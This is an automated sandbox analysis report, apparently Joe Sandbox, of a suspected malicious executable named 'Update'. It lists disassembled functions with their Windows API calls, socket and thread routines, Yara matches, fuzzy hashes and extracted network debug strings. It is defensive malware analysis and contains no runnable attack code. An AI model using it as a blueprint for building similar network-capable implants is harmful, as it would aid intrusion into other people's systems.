                                                                                            • SetLastError.KERNEL32(00000000), ref: 034E3621
                                                                                            • GetLastError.KERNEL32 ref: 034E3639
                                                                                              • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
                                                                                              • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
                                                                                              • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
                                                                                              • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
                                                                                              • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
                                                                                              • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
                                                                                              • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
                                                                                            • SetLastError.KERNEL32(00000000), ref: 034E3649
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorEventInterlockedLast$Incrementsetsockopt$CloseCreateCurrentExchangeResetThreadTimerWaitable_free_malloc_memsetclosesocketsendshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 127459856-0
                                                                                            • Opcode ID: f2f80fc5b06151327e987d7a78b200734f8939ea0f0eb5e35b150d7df5c4adeb
                                                                                            • Instruction ID: bc049b386a9b3eabe60328956106d9e8b1c8fb2c259978eb20e635520f3e9794
                                                                                            • Opcode Fuzzy Hash: f2f80fc5b06151327e987d7a78b200734f8939ea0f0eb5e35b150d7df5c4adeb
                                                                                            • Instruction Fuzzy Hash: 37418DB5600704AFD3A0EF79DC81B6AB7E8FB48702F50096EE646DB750D7B1E4058B54
                                                                                            Function 034E4430 Relevance: 13.6, APIs: 9, Instructions: 93synchronizationtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E4443
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E444C
                                                                                            • timeGetTime.WINMM ref: 034E444E
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E445D
                                                                                            • WaitForSingleObject.KERNEL32(?,00001770), ref: 034E44AB
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E44C8
                                                                                              • Part of subcall function 034E3F60: GetCurrentThreadId.KERNEL32 ref: 034E3F65
                                                                                              • Part of subcall function 034E3F60: send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
                                                                                              • Part of subcall function 034E3F60: SetEvent.KERNEL32(?), ref: 034E3FE9
                                                                                              • Part of subcall function 034E3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
                                                                                              • Part of subcall function 034E3F60: WSACloseEvent.WS2_32(?), ref: 034E4003
                                                                                              • Part of subcall function 034E3F60: shutdown.WS2_32(?,00000001), ref: 034E401B
                                                                                              • Part of subcall function 034E3F60: closesocket.WS2_32(?), ref: 034E4025
                                                                                            • ResetEvent.KERNEL32(?), ref: 034E44DC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Event$Reset$ExchangeInterlocked$CloseCurrentObjectSingleThreadTimeWaitclosesocketsendshutdowntime
                                                                                            • String ID:
                                                                                            • API String ID: 542259498-0
                                                                                            • Opcode ID: cac0eb440a11b0f60278fae46dffb4aedebe2a1c61da804925013a4d2e9dd269
                                                                                            • Instruction ID: 39e8aba41ad96d2e3b832a0fa022793f46448d7b745fb8b59ccdacaf917fb615
                                                                                            • Opcode Fuzzy Hash: cac0eb440a11b0f60278fae46dffb4aedebe2a1c61da804925013a4d2e9dd269
                                                                                            • Instruction Fuzzy Hash: 242181762007046BC230EF7ADC85E97B3E8EF8C711F100A0EE59ACB750D672E4059BA4
                                                                                            Function 034E4E80 Relevance: 13.6, APIs: 9, Instructions: 70COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000139F,?), ref: 034E4E99
                                                                                            • TryEnterCriticalSection.KERNEL32(?,?), ref: 034E4EB8
                                                                                            • TryEnterCriticalSection.KERNEL32(?), ref: 034E4EC2
                                                                                            • SetLastError.KERNEL32(0000139F), ref: 034E4ED9
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E4EE2
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 034E4EE9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterErrorLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4082018349-0
                                                                                            • Opcode ID: 73dc0548fd5918cd03bd0ae8b8ea55c6a7366eb3dee6a7ec291bba0e5c6a308b
                                                                                            • Instruction ID: 3aa4e4609203777989ce4e216ff043b53c3498f4cb00e9a1621037ed41cd120f
                                                                                            • Opcode Fuzzy Hash: 73dc0548fd5918cd03bd0ae8b8ea55c6a7366eb3dee6a7ec291bba0e5c6a308b
                                                                                            • Instruction Fuzzy Hash: E61186327003059BD320EABEEC8896BF3DCEB88616B040A2FE655C6650D671D805D7A9
                                                                                            Function 034EDD10 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 132COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetLastError.KERNEL32(0000007F), ref: 034EDD32
                                                                                            • SetLastError.KERNEL32(0000007F), ref: 034EDE35
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: Main
                                                                                            • API String ID: 1452528299-521822810
                                                                                            • Opcode ID: 0bf8c16c0d9247f1742ea262ac8bb132069603329c17e1859c9db86614aaa08d
                                                                                            • Instruction ID: 51fc3c8a0eb998cdce300b49be632039c3441b41538bf319fba5e698532fd708
                                                                                            • Opcode Fuzzy Hash: 0bf8c16c0d9247f1742ea262ac8bb132069603329c17e1859c9db86614aaa08d
                                                                                            • Instruction Fuzzy Hash: C441DE31A00609DFD720DF98D884BAAB3E8FF95315F0846AAE8498F351E771E945CB84
                                                                                            Function 6C39CC10 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F1BBC535,QQ9l,6C39CD1F,QQ9l,?,00000000), ref: 6C39CCD1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: FreeLibrary
                                                                                            • String ID: QQ9l$api-ms-$ext-ms-
                                                                                            • API String ID: 3664257935-1877487809
                                                                                            • Opcode ID: 3a4ee203279c5dfb47fbb83922d5c3ff9e9329fa50ed97e0c50b2860e91e693b
                                                                                            • Instruction ID: eb4f6750c6ca76a252642c40da0718ea578ec7d2314f1f682b06395612b08433
                                                                                            • Opcode Fuzzy Hash: 3a4ee203279c5dfb47fbb83922d5c3ff9e9329fa50ed97e0c50b2860e91e693b
                                                                                            • Instruction Fuzzy Hash: 39210531B41221ABDB12BB69AC54A4A3F7CDB43364F240615E915B7A80E731ED02CEE0
                                                                                            Function 6C38CB29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 6C38CB70
                                                                                            • __alloca_probe_16.LIBCMT ref: 6C38CB9C
                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 6C38CBDB
                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C38CBF8
                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 6C38CC37
                                                                                            • __alloca_probe_16.LIBCMT ref: 6C38CC54
                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 6C38CC96
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C38CCB9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                            • String ID:
                                                                                            • API String ID: 2040435927-0
                                                                                            • Opcode ID: 486e72272683e5715954602194a35428abefec512c37e7c7bbc5dab351ffdf7a
                                                                                            • Instruction ID: 52305e4eb9bd89df94efb40f970aca5f03d5287a307af78118bed06c56d91b69
                                                                                            • Opcode Fuzzy Hash: 486e72272683e5715954602194a35428abefec512c37e7c7bbc5dab351ffdf7a
                                                                                            • Instruction Fuzzy Hash: F651C272602606AFEF116F68DC44FAB3BB8EF41758F204624F910E6690DB31DD058F60
                                                                                            Function 00913F37 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00913F3C
                                                                                            • SetLastError.KERNEL32(0000139F,?,10015054,0091361F), ref: 0091402B
                                                                                              • Part of subcall function 00912B57: SwitchToThread.KERNEL32 ref: 00912B81
                                                                                            • send.WS2_32(?,10017440,00000010,00000000), ref: 00913F9D
                                                                                            • SetEvent.KERNEL32(?), ref: 00913FC0
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 00913FCC
                                                                                            • WSACloseEvent.WS2_32(?), ref: 00913FDA
                                                                                            • shutdown.WS2_32(?,00000001), ref: 00913FF2
                                                                                            • closesocket.WS2_32(?), ref: 00913FFC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3563247170.0000000000910000.00000040.00001000.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_910000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: EventThread$CloseCurrentErrorExchangeInterlockedLastSwitchclosesocketsendshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 518013673-0
                                                                                            • Opcode ID: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                                            • Instruction ID: 8128a391cdd25cc958a9f9317864a928c4ac6e838d49c73b77cd2113b542fc0a
                                                                                            • Opcode Fuzzy Hash: 5b0e511d635cae701d0a261cd8daf94e2af27413da8a227727d1db7110453b86
                                                                                            • Instruction Fuzzy Hash: AD212A71300714DBE3359F69C888B9AB7B9BF48715F14891DF6828BA90C7B6E885CB50
                                                                                            Function 034E3F60 Relevance: 12.1, APIs: 8, Instructions: 79networkthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E3F65
                                                                                            • SetLastError.KERNEL32(0000139F,?,74DEDFA0,034E3648), ref: 034E4054
                                                                                              • Part of subcall function 034E2BC0: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 034E2BD6
                                                                                              • Part of subcall function 034E2BC0: SwitchToThread.KERNEL32 ref: 034E2BEA
                                                                                            • send.WS2_32(?,035049C0,00000010,00000000), ref: 034E3FC6
                                                                                            • SetEvent.KERNEL32(?), ref: 034E3FE9
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 034E3FF5
                                                                                            • WSACloseEvent.WS2_32(?), ref: 034E4003
                                                                                            • shutdown.WS2_32(?,00000001), ref: 034E401B
                                                                                            • closesocket.WS2_32(?), ref: 034E4025
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventExchangeInterlockedThread$CloseCompareCurrentErrorLastSwitchclosesocketsendshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 3254528666-0
                                                                                            • Opcode ID: 062cb3364161fc76439f6749f4503a448225391ed57eb56e2fb368885035cffe
                                                                                            • Instruction ID: 672fd322d4788d0a16d28f95df33177716ffe3811c349229535475a187fa6f9a
                                                                                            • Opcode Fuzzy Hash: 062cb3364161fc76439f6749f4503a448225391ed57eb56e2fb368885035cffe
                                                                                            • Instruction Fuzzy Hash: 432108752007009BD330EF69D88CB5BB7B9BB44716F144D1EE2928BB90C7B6E4459B54
                                                                                            Function 034E4060 Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • EnterCriticalSection.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4074
                                                                                            • ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4087
                                                                                            • ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4090
                                                                                            • ResetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4099
                                                                                              • Part of subcall function 034E1350: HeapFree.KERNEL32(?,00000000,?,?,?,034E40A6,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E1390
                                                                                              • Part of subcall function 034E1420: HeapFree.KERNEL32(?,00000000,?,?,?,034E40B1,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E143D
                                                                                              • Part of subcall function 034E1420: _free.LIBCMT ref: 034E1459
                                                                                            • HeapDestroy.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E40B9
                                                                                            • HeapCreate.KERNEL32(?,?,?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E40D4
                                                                                            • SetEvent.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4150
                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,034E4039,?,74DEDFA0,034E3648), ref: 034E4157
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: EventHeap$Reset$CriticalFreeSection$CreateDestroyEnterLeave_free
                                                                                            • String ID:
                                                                                            • API String ID: 1219087420-0
                                                                                            • Opcode ID: 6625312a5e361be12c0099bf679cce66d789ae0ceed730746967bc2133aa47b9
                                                                                            • Instruction ID: 71aab08745a4651faeeb72d3624b208fc286f20c72254873fb26c4f93635e2d1
                                                                                            • Opcode Fuzzy Hash: 6625312a5e361be12c0099bf679cce66d789ae0ceed730746967bc2133aa47b9
                                                                                            • Instruction Fuzzy Hash: EA314975200A06AFD705EF75D848BA6F7A8FF48315F04865AE4298B360CB35B816DFD4
                                                                                            Function 0002101B Relevance: 12.1, APIs: 8, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _set_app_type.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000002), ref: 0002101E
                                                                                            • _set_fmode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00021029
                                                                                            • __p__commode.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000002), ref: 00021035
                                                                                            • __RTC_Initialize.LIBCMT ref: 0002104D
                                                                                            • _configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,000217FA), ref: 00021062
                                                                                              • Part of subcall function 0002155C: InitializeSListHead.KERNEL32(000230C0,00021072), ref: 00021561
                                                                                            • __setusermatherr.API-MS-WIN-CRT-MATH-L1-1-0(Function_0000154F), ref: 00021080
                                                                                            • _configthreadlocale.API-MS-WIN-CRT-LOCALE-L1-1-0(00000000), ref: 0002109B
                                                                                            • _initialize_narrow_environment.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 000210AA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3562466950.0000000000021000.00000020.00000001.01000000.00000005.sdmp, Offset: 00020000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3562433732.0000000000020000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562507849.0000000000022000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562539425.0000000000023000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000024000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3562581470.0000000000066000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_20000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Initialize$HeadList__p__commode__setusermatherr_configthreadlocale_configure_narrow_argv_initialize_narrow_environment_set_app_type_set_fmode
                                                                                            • String ID:
                                                                                            • API String ID: 1933938900-0
                                                                                            • Opcode ID: 315d5551eba9dd7793f0969fdb3a04e9c8aa9acc4db933c303e7390013b78796
                                                                                            • Instruction ID: d557aff98991b80415d4b1814c092c83c48e5cfd8e882c8a0b8043079e12abb6
                                                                                            • Opcode Fuzzy Hash: 315d5551eba9dd7793f0969fdb3a04e9c8aa9acc4db933c303e7390013b78796
                                                                                            • Instruction Fuzzy Hash: 05019675A48FB1E4D9643BF93907ADE02AA0FF0794F6109D5F9069A083EEA5C5C140F3
                                                                                            Function 0304B62F Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 351COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564075355.0000000003040000.00000040.00001000.00020000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_3040000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memset$_malloc
                                                                                            • String ID: ($6$gfff$gfff
                                                                                            • API String ID: 3506388080-713438465
                                                                                            • Opcode ID: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                            • Instruction ID: 39367311531b9a9d59523056ce787cf4119cc556e98def142e3fd4cc5b3b5780
                                                                                            • Opcode Fuzzy Hash: adc29c7617633d4b8d790a07087d8aa0c6b7af03618b52efd29b7f2ce1e6f169
                                                                                            • Instruction Fuzzy Hash: 63D18DB1D02318EFDB10EFE5E885A9EBBB9FF88300F104529E905AB251D774A905CB91
                                                                                            Function 6C39EB85 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 3213747228-0
                                                                                            • Opcode ID: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                            • Instruction ID: 363f8884845df0e20ecab6373eeadbdabafe8a1b33984ebe3495529204e59a69
                                                                                            • Opcode Fuzzy Hash: a85807fc997ee618783a6036bf783e221dda6a75a837a72a657676350f801317
                                                                                            • Instruction Fuzzy Hash: 41B14232A05355AFEB018F68CC81BAEBBA5FF56318F184165E844AB781F3759901CFE1
                                                                                            Function 034E2140 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 303COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034E1610: __vswprintf.LIBCMT ref: 034E1646
                                                                                            • _malloc.LIBCMT ref: 034E2330
                                                                                              • Part of subcall function 034EF673: __FF_MSGBANNER.LIBCMT ref: 034EF68C
                                                                                              • Part of subcall function 034EF673: __NMSG_WRITE.LIBCMT ref: 034EF693
                                                                                              • Part of subcall function 034EF673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF6B8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap__vswprintf_malloc
                                                                                            • String ID: [RI] %d bytes$input ack: sn=%lu rtt=%ld rto=%ld$input probe$input psh: sn=%lu ts=%lu$input wins: %lu
                                                                                            • API String ID: 3723585974-868042568
                                                                                            • Opcode ID: f7bdc68a8e16a89a065ec2a791f2a237585212d2137bc45b74cd742977cbfd10
                                                                                            • Instruction ID: e6d213780f1cd410ec51aab4a14b3cd2f8f8ccd1d4fd3bbcf7af690f61fd4db1
                                                                                            • Opcode Fuzzy Hash: f7bdc68a8e16a89a065ec2a791f2a237585212d2137bc45b74cd742977cbfd10
                                                                                            • Instruction Fuzzy Hash: 6BB1B475A002058FCF18EF69D880AAEB7A9BF44311F0849AFDD199F346D7B1D941CB98
                                                                                            Function 034E1830 Relevance: 10.7, APIs: 7, Instructions: 152COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 034E1878
                                                                                            • _free.LIBCMT ref: 034E18B6
                                                                                            • _free.LIBCMT ref: 034E18F5
                                                                                            • _free.LIBCMT ref: 034E1935
                                                                                            • _free.LIBCMT ref: 034E195D
                                                                                            • _free.LIBCMT ref: 034E1981
                                                                                            • _free.LIBCMT ref: 034E19B9
                                                                                              • Part of subcall function 034EF639: RtlFreeHeap.NTDLL(00000000,00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76), ref: 034EF64F
                                                                                              • Part of subcall function 034EF639: GetLastError.KERNEL32(00000000,?,034F3E4C,00000000,?,034F4500,00000000,00000001,00000000,?,034F8DE6,00000018,03506448,0000000C,034F8E76,00000000), ref: 034EF661
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 7affac38314d1018a79a6e4f9d4366216815eb94c66f538062d4506e23fe757e
                                                                                            • Instruction ID: 831e2e4883b1aadc5bdbe1ffde13565b819ea0932a343e8a1e5290b727dac8cf
                                                                                            • Opcode Fuzzy Hash: 7affac38314d1018a79a6e4f9d4366216815eb94c66f538062d4506e23fe757e
                                                                                            • Instruction Fuzzy Hash: B8515FB6A40214CFC704DF59C18486AFBA6FF8921571A80AEC61A9F321D732BD47CF95
                                                                                            Function 034E3870 Relevance: 10.6, APIs: 7, Instructions: 149threadnetworktimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E3883
                                                                                            • SetWaitableTimer.KERNEL32(?,?,?,00000000,00000000,00000000,?,00000000,FFFFD8F0,000000FF), ref: 034E38C4
                                                                                            • WSAWaitForMultipleEvents.WS2_32(00000004,?,00000000,000000FF,00000000), ref: 034E3931
                                                                                            • GetCurrentThreadId.KERNEL32 ref: 034E395C
                                                                                            • GetLastError.KERNEL32(?,00000000,000000FF,00000000), ref: 034E39F4
                                                                                            • SetLastError.KERNEL32(0000139F,?,00000000,000000FF,00000000), ref: 034E3A22
                                                                                            • WSAGetLastError.WS2_32(?,00000000,000000FF,00000000), ref: 034E3A39
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$CurrentThread$EventsMultipleTimerWaitWaitable
                                                                                            • String ID:
                                                                                            • API String ID: 3058130114-0
                                                                                            • Opcode ID: 0821288a55dda2f11a9d214c66cc241af8e426856035b018f3824d7bd219d1ff
                                                                                            • Instruction ID: c13b48690828bce8d16a2d5d67dda6c8cdf0bc3812808861ed30478a42f8c985
                                                                                            • Opcode Fuzzy Hash: 0821288a55dda2f11a9d214c66cc241af8e426856035b018f3824d7bd219d1ff
                                                                                            • Instruction Fuzzy Hash: 95518B786007019BDB21DF29C984BABB7E8BF04716F14091FD95A9F380DB31E8418F49
                                                                                            Function 6C38DA10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DA47
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C38DA4F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DAD8
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C38DB03
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 6C38DB58
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
